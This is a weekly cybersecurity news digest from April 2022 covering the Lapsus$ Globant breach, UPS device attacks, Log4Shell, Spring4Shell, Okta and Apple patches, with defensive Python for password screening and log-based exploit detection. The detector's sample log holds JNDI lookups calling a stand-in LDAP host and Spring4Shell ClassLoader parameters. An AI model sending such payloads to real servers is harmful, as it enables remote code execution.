Lapsus$ is back, Apple's urgent security patch and more. What you need to know from last week.

We're all busy. We know we should be keeping a better eye on the latest developments in cybersecurity, but life and work can seem to get in the way.


Here's a look at what you need to know from last week heading into your Monday, April 4, 2022.


Topic of the week:


Globant – Lapsus$ Breach

Lapsus$ is back from its “vacation,” announcing its return with a blow to the software consultancy giant Globant. The breach targeted the Globant DevOps team: the group released admin credentials (usernames and passwords) for the team's tooling along with roughly 70GB of data belonging to Globant's customers.

At 9:50 pm CST on March 29, Lapsus$ posted to its Telegram channel a screenshot of the customer data it had obtained, presumably using the compromised Globant DevOps credentials. Minutes later it posted the credentials themselves and at least some of the data pulled from Globant's servers.


Globant works with some of the largest companies in the world, and this breach appears to expose data for Arcserve, Facebook, the Apple Health app, DHL, Citibank, BNP Paribas Cardif and Citibanamex, among others.


Researchers were quick to point out that the company wasn't using MFA on the compromised tools and that the passwords were short and easily guessable. Some of them even appear on common-password lists, which by itself points to serious shortcomings in the security practices at play. After releasing the data, Lapsus$ said it was publishing the passwords “for anyone who is interested about the poor security practices in use at Globant.com.”
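The practical takeaway from the Globant credentials is a screening step rather than a complexity rule: reject short passwords, anything on a common-password list (including trivial variants such as Welcome2022!), and anything already seen in breach data, and do the breach lookup without sending the password anywhere. The Python below is an added example, not code from Globant or from the Threatpost article. Its word list and the Have I Been Pwned "range" response are short constructed stand-ins, and `offline_range` is a hypothetical substitute for the real HTTPS call, so nothing leaves the machine.

```python
"""Password screening in the spirit of NIST SP 800-63B: a length floor, a
common-password blocklist, and a k-anonymity breach-corpus check.
Added example; the word list and the HIBP range text are constructed stand-ins."""
import hashlib
import re
import unicodedata

MIN_LENGTH = 8  # NIST SP 800-63B floor for user-chosen passwords

# Constructed stand-in for a common-passwords list (real lists run to millions of entries).
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome", "admin", "summer"}

# Constructed stand-in for the Have I Been Pwned /range/5BAA6 response ("suffix:count" lines).
# The first suffix is the real tail of SHA-1("password"); the other two are made up.
HIBP_RANGE_5BAA6 = """\
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
0D3F4CB5B2C35A4A1A0A0B1E4E4DC3C9A11:2
F3E1D2C4B5A69788776655443322110FFEE:1
"""

_TRAILING_NOISE = re.compile(r"[\d!@#$%^&*._-]+$")


def canonical(pw):
    """Fold case, Unicode-normalize and drop trailing digits/symbols, so that
    'Welcome2022!' is compared with the blocklist as 'welcome'."""
    pw = unicodedata.normalize("NFKC", pw).lower()
    return _TRAILING_NOISE.sub("", pw) or pw


def hibp_split(pw):
    """k-anonymity split: only the 5-hex-char prefix of SHA-1(pw) ever leaves the host."""
    digest = hashlib.sha1(pw.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def pwned_count(pw, fetch_range):
    """fetch_range(prefix) returns the range text; the suffix match is done locally."""
    prefix, suffix = hibp_split(pw)
    for line in fetch_range(prefix).splitlines():
        cand, _, count = line.strip().partition(":")
        if cand == suffix:
            return int(count or 0)
    return 0


def offline_range(prefix):
    """Hypothetical stand-in for GET https://api.pwnedpasswords.com/range/<prefix>."""
    return HIBP_RANGE_5BAA6 if prefix == "5BAA6" else ""


def check_password(pw, username="", fetch_range=None):
    """Return (accepted, reasons). Every failing rule is reported, not just the first."""
    reasons = []
    if len(pw) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if username and username.lower() in pw.lower():
        reasons.append("contains the username")
    if canonical(pw) in COMMON_PASSWORDS:
        reasons.append("matches a common password (after stripping trailing digits/symbols)")
    if fetch_range is not None:
        n = pwned_count(pw, fetch_range)
        if n:
            reasons.append(f"seen {n} times in breach data")
    return (not reasons, reasons)


if __name__ == "__main__":
    for pw, user in [("password", "admin"), ("Welcome2022!", "jdoe"), ("tuesday-orbit-granite-7", "jdoe")]:
        ok, why = check_password(pw, user, offline_range)
        print(f"{pw!r}: {'accepted' if ok else 'rejected: ' + '; '.join(why)}")
```

Wire `check_password` into the password-change path and the initial provisioning flow, and pass a real `fetch_range` that calls the HIBP range endpoint over HTTPS; the prefix-only query is what keeps the check safe to run against a third-party service.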


To read more, check out this article from Threatpost:

https://threatpost.com/lapsus-back-from-vacation/179156/


Cyber attacks:


UPS Attacks

Not UPS as in the shipping company, but UPS as in uninterruptible power supply. UPSs are the backbone of any data center and of many other critical systems worldwide, keeping them running through outages and unstable power. This week the Cybersecurity and Infrastructure Security Agency (CISA), together with the Department of Energy, released an alert warning that threat actors are gaining access to internet-connected UPS devices, often through unchanged default usernames and passwords.

Not long ago a UPS was never connected to the internet; it kept the power on, and that was it. But in recent years the internet of things has reached UPS manufacturers too, and newer models ship with network management interfaces for various ease-of-use reasons. As workforces continue to decentralize, being able to manage the UPSs in your data center remotely has become a practical necessity.

The danger is that a foothold on a UPS management interface can serve as a pivot for lateral movement across your network, leading to a whole host of malicious activity, from targeting other internal systems to cutting power to mission-critical equipment. The alert's mitigations are straightforward: enumerate every UPS and similar device, take their management interfaces off the internet, and where remote access is unavoidable put them behind a VPN with MFA enforced and replace any default credentials with strong, unique passwords.


https://www.cisa.gov/uscert/ncas/current-activity/2022/03/29/mitigating-attacks-against-uninterruptable-power-supply-devices


https://threatpost.com/cyberattackers-ups-backup-power-critical-environments/179169/


Cyber news:


VMware Log4Shell

The notorious Log4j vulnerability (Log4Shell) is still being exploited in the wild, and attackers have moved beyond the opportunistic scanning seen in the hours and days after its disclosure. VMware Horizon servers, a common Virtual Desktop Infrastructure (VDI) platform across corporate verticals, were affected by Log4Shell, and researchers are now reporting unpatched Horizon instances being used to deploy cryptominers and backdoors. While VMware has released patches, Horizon is often indispensable to day-to-day business operations. Taking it down means significant downtime for employees, so many companies have been slow to update. Hard as the downtime may be to stomach, the cost of delay is substantial: as long as systems remain exposed, attackers have more time to deepen their foothold and extend the duration of their access, multiplying the financial risk.


https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/


Spring4Shell

Similar to Log4Shell, the Spring Framework team this week disclosed a Remote Code Execution (RCE) vulnerability, now known as Spring4Shell (CVE-2022-22965), that was already being exploited before a fix was available. The flaw is in Spring MVC and WebFlux request data binding: a crafted request (GET or POST) whose parameter names walk through class.module.classLoader can reach the application's ClassLoader and, in the commonly affected setup (JDK 9 or later, deployed as a WAR on Apache Tomcat), write a web shell to disk, giving the attacker control of the server. The vulnerability has been patched in Spring Framework 5.3.18 and 5.2.20, although the developers warn that the nature of the flaw is more general and other exploitation paths may exist, so they also recommend the defense-in-depth workaround of disallowing the class.*, Class.*, *.class.* and *.Class.* field patterns in WebDataBinder. It is up to developers everywhere to upgrade and apply the workaround wherever their software is exposed.
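For the operations side of both this item and the VMware Horizon item above, the useful artifact is a detection you can run over logs you already have. The Python below is an added example, not code from Spring, VMware or the Threatpost articles: it scans web-server access logs in the common "combined" format for Log4Shell lookups (`${jndi:...}`, including the nested-lookup obfuscations seen in the wild) and for Spring4Shell-style parameter names that bind through `.class` into the ClassLoader, which is exactly the path Spring's recommended `class.*` denylist blocks. The sample log lines are constructed, not real traffic.

```python
"""Scan combined-format web access logs for Log4Shell and Spring4Shell attempts.
Added example; SAMPLE_LOG is constructed, not real traffic."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Log4j nested-lookup obfuscation: ${lower:j}, ${upper:J}, ${env:NOPE:-j}, ${::-j}
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)

# A binding path that passes through ".class" reaches java.lang.Class and the ClassLoader;
# legitimate form fields never do, which is why Spring's workaround denies class.* and *.class.*
CLASS_BINDING_RE = re.compile(r"(^|\.)class\.", re.I)


def normalize_log4j(text):
    """Repeatedly collapse ${lower:x}, ${upper:x} and ${...:-x} so ${jndi:...} becomes visible."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
    return text


def query_keys(request_line):
    """Parameter names from the request line's target, URL-decoded."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    return [k for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)]


def scan_access_log(lines):
    """Return (line_no, indicator, client) tuples; 'unparsed' marks lines not in combined format."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            findings.append((n, "unparsed", None))
            continue
        client = m["client"]
        # Log4Shell: the lookup can sit in any logged field and is often URL-encoded.
        blob = " ".join(unquote(m[f]) for f in ("request", "referer", "agent"))
        if JNDI_RE.search(normalize_log4j(blob)):
            findings.append((n, "log4shell", client))
        # Spring4Shell: parameter names that walk into the ClassLoader.
        if any(CLASS_BINDING_RE.search(k) for k in query_keys(m["request"])):
            findings.append((n, "spring4shell", client))
    return findings


# Constructed sample: one benign request, two Log4Shell probes (User-Agent, then a
# URL-encoded and obfuscated path), one Spring4Shell probe, and one benign request
# whose parameters merely contain the word "class".
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Mar/2022:21:50:01 -0600] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [29/Mar/2022:21:50:02 -0600] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.9:1389/a}"',
    '198.51.100.9 - - [29/Mar/2022:21:50:03 -0600] '
    '"GET /%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.9%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.22 - - [29/Mar/2022:21:50:04 -0600] "GET /api/user?'
    'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di&'
    'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" '
    '200 0 "-" "python-requests/2.27.1"',
    '203.0.113.8 - - [29/Mar/2022:21:50:05 -0600] "GET /search?q=class.module&className=Foo HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, indicator, client in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {indicator} from {client}")
```

Access logs record only the request line and a few headers, so this catches Log4Shell payloads placed anywhere that gets logged (path, query, Referer, User-Agent) and Spring4Shell parameters sent in the query string. The canonical Spring4Shell exploit POSTs its parameters in the body, which most access logs do not capture, so pair this with a WAF or application-level log where request bodies are available.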


Some of you might know that we use the Spring Framework at SOFTwarfare for our solutions. Rest assured, the team and I have thoroughly vetted our codebase on both products. We are not affected by the Spring4Shell vulnerability.


https://threatpost.com/critical-rce-bug-spring-log4shell/179173/


Okta Breach

Okta has now released a public statement on the breach it suffered in January. Okta admits it “made a mistake” in handling the Lapsus$ intrusion. Okta initially reported that the attempt had been unsuccessful but is now backpedalling, saying it should have run the investigation itself rather than relying on reports from the affected third-party support provider. In fact, it appears Lapsus$ used its access to that provider's environment to reach a “superuser/admin” account for Okta's internal systems. Okta admits the attack affected 366 clients, or 2.5% of its customer base. Okta continues to face questions about why customers were not notified in January when the company first became aware. Industry experts predict Okta's clients have hard decisions ahead as they decide whether they can continue to trust their key IAM provider.


https://threatpost.com/okta-goofed-lapsus-attack/179129/

Apple Patches

Apple has released iOS and macOS updates patching two zero-day vulnerabilities, both of which Apple says may have been actively exploited, consistent with the quick, unscheduled release. Apple typically discloses little if any detail on the vulnerabilities it fixes, as a security measure, so the fact that it said this much signals that these are serious. Make sure to update your systems as soon as possible!

https://threatpost.com/apple-rushes-out-patches-0-days-macos-ios/179222/


In general, I would like to wrap up with this: stay alert for phishing and email scams this week especially. CISA has issued a lot of warnings about targeted phishing campaigns and various other scams, which may be harder to detect than your run-of-the-mill mass phishing attempts. Stay alert - sometimes paranoia is your friend.


https://www.cisa.gov/uscert/ncas/current-activity/2022/03/30/fbi-releases-pin-phishing-campaign-against-us-election-officials


https://isc.sans.edu/diary/rss/28492


https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/


https://threatpost.com/belarusian-ghostwriter-actor-picks-up-bitb-for-ukraine-related-attacks/179210/